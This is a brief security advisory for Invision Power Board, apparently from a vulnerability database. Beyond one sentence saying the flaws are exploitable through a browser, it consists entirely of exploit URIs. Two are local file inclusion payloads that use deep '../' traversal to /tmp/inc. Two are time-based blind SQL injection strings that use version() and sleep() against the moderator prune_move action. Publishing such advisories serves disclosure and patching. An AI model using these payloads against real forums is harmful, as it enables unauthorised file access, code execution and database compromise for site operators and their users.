Invision Power Board Local File Include and SQL Injection Vulnerabilities

Invision Power Board Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/forum/index.php?app=core&module=global&section=register&any=?section
=../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/inc

http://www.example.com/forum/index.php?
app=core&module=global&section=register/register/page__section__../../../../../../../../../../../../../../../../../../../.././tmp/inc__

http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&s
tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd

http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR
%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c